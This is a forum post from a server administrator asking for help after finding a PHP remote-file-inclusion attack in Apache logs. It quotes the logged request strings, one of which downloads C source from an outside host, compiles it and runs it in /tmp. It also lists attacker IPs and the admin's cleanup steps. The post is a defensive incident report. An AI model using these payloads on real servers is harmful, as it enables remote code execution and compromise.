Server security - experts please comment.

Hello,

I just went through the raw log files of Apache and discovered something 'very interesting'. Actually we include scripts in the main page as a programming practice. But this guy took advantage of this this and tried including his stuff.

There are these two enteries in my Apache logs
<url>?pagename=http://d-a.newmail.ru/abc.php&cmd=ls
and
<url>?pagename=http://d-a.newmail.ru/abc.php&cmd=cd%20/tmp;wget%20http://d-a.newmail.ru/kalitka.c;gcc%20kalitka.c;./a.out

1st entry if of May 1 and the other of May 8. This guy's browser/OS signature is same for both the enteries.
Mozilla/4.0 (compatible; MSIE 5.0; Windows 2000) Opera 6.01 [ru]

The IP's he has been using are
212.76.160.51 -> could not be traced
200.204.125.170 -> points to Brazil

Now I suppose this guy is from Russia and was using a Brazillian proxy server.

The code which he compiled on the server is located at
http://www.dwcr0up.biz/releases/

He was running a.out, an executable output of this code.

Now my question is to what extent was the machine compromised?

The remedial action I took was
a) Made PHP safe by using open_basedir and disable_functions.
b) Deleted a.out from /tmp
c) Changed the root password

Is this enough?

Also is there a way to stop including files from external URL's?

K Singh

 

 

 

 

Top